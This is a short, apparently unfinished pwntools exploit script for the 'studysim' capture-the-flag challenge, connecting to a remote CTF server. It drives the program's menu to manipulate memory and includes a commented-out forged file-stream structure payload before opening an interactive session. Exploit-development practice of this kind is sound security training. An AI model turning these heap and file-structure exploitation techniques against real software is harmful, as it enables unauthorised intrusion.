from pwn import *

e = ELF("./studysim")
libc = ELF("./libc.so.6")

context.binary = e.path

is_remote = "--remote" in sys.argv
def debug():
  if not is_remote:
    gdb.attach(p)

if is_remote:
  p = remote("pwn.hsctf.com", 5007)
else:
  p = process(e.path)
  # {"LD_PRELOAD": libc.path})

def add(size, data="AAAA"):
  p.sendlineafter(">", "add")
  p.sendlineafter("?", str(size))
  p.sendlineafter("?", data)

def do(amt):
  p.sendlineafter(">", "do")
  p.sendlineafter("?", str(amt))
  
do(4)

debug()

add(0x100)

do(1)

buff = 0x404100
# add(0x100, p64(0xfbad208b) + p64(buff) * 7 + p64(buff + 1) + p64(0) * 6 + "\xff" * 8 + p64(0) + p64(buff + 0x100) + "\xff" * 8 + p64(0) + p64(buff + 0x200) + p64(0) * 6 + p64(buff + 0x300))

p.interactive()
